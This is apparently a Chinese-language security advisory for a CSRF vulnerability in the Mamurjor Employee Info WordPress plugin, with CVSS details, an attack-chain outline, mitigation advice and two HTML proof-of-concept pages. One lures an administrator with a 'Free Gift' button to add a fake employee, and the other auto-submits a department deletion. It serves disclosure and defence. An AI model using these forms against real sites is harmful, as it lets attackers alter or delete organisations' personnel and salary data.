CVE-2025-13990 WordPress Mamurjor Employee Info插件CSRF漏洞

漏洞信息

漏洞编号

CVE-2025-13990

漏洞类型

CSRF（跨站请求伪造）

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Mamurjor Employee Info WordPress插件

漏洞概述

Mamurjor Employee Info是WordPress平台上的一款员工信息管理插件，主要用于管理企业员工的部门、职位、薪资等信息。该插件在1.0.0及以下所有版本中存在严重的跨站请求伪造（CSRF）漏洞。漏洞根源在于多个管理功能函数缺少WordPress nonce令牌验证机制。攻击者可以构造恶意请求，诱骗已登录的管理员访问，从而在管理员不知情的情况下执行创建、更新或删除员工记录、部门、职位、薪资等级、教育记录和薪资支付等操作。由于该漏洞影响WordPress后台管理功能，攻击成功可能导致企业员工信息被篡改或泄露，对组织的人事数据安全构成威胁。

技术细节

该漏洞源于Mamurjor Employee Info插件admin/admin.php文件中的多个管理函数缺少WordPress的wp_verify_nonce()验证。具体问题出现在第10行、第30行和第47行等位置的函数中，这些函数直接处理员工记录、部门、职位、薪资等敏感数据的增删改查操作，却未对请求来源进行合法性验证。攻击者可以利用这一缺陷构造包含恶意参数的表单或URL，通过社会工程学手段诱导管理员点击。当管理员访问攻击者精心构造的链接时，浏览器会自动携带管理员的认证cookie向目标站点发送请求。WordPress无法区分这是管理员的合法操作还是攻击者伪造的请求，因为插件本身未实施CSRF令牌检查。攻击者可借此实现对员工数据库的非法操作，包括添加虚假员工记录、修改薪资信息、删除部门数据等。

攻击链分析

STEP 1

步骤1

攻击者识别目标网站使用的Mamurjor Employee Info插件版本≤1.0.0

STEP 2

步骤2

攻击者分析插件的admin/admin.php文件，找到缺少nonce验证的管理函数

STEP 3

步骤3

攻击者构造包含恶意参数的CSRF表单或恶意链接

STEP 4

步骤4

攻击者通过钓鱼邮件、社交工程等方式诱导WordPress管理员访问恶意链接

STEP 5

步骤5

管理员浏览器自动发送携带有效session cookie的请求到目标站点

STEP 6

步骤6

插件因缺少nonce验证而执行攻击者指定的增删改操作

STEP 7

步骤7

员工信息、部门数据或薪资记录被篡改，攻击完成

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<html> <body> <h1>Mamurjor Employee Info CSRF Exploit</h1> <p>Click the button below to add a fake employee record:</p> <form action="http://target-site.com/wp-admin/admin.php" method="POST" id="exploitForm"> <input type="hidden" name="page" value="mamurjor-employee-info"> <input type="hidden" name="action" value="add_employee"> <input type="hidden" name="employee_name" value="Fake Employee"> <input type="hidden" name="employee_email" value="[email protected]"> <input type="hidden" name="employee_department" value="1"> <input type="hidden" name="employee_designation" value="1"> <input type="hidden" name="employee_salary" value="999999"> <input type="hidden" name="submit" value="Add Employee"> </form> <button type="submit" form="exploitForm">Click Here for Free Gift!</button> <script> // Auto-submit on page load (commented out for safety) // document.getElementById('exploitForm').submit(); </script> </body> </html>  <html> <body> <h1>CSRF Delete Department PoC</h1> <form action="http://target-site.com/wp-admin/admin.php" method="POST"> <input type="hidden" name="page" value="mamurjor-department"> <input type="hidden" name="action" value="delete_department"> <input type="hidden" name="department_id" value="1"> <input type="hidden" name="_wpnonce" value="">  </form> <script>document.forms[0].submit();</script> </body> </html>

影响范围

Mamurjor Employee Info WordPress插件 ≤ 1.0.0

防御指南

临时缓解措施

由于该插件开发者可能未及时发布安全更新，建议暂时禁用Mamurjor Employee Info插件，或使用其他具备完善CSRF防护的员工信息管理插件替代。同时应教育管理员不要点击未知来源的链接，以降低被社会工程攻击的风险。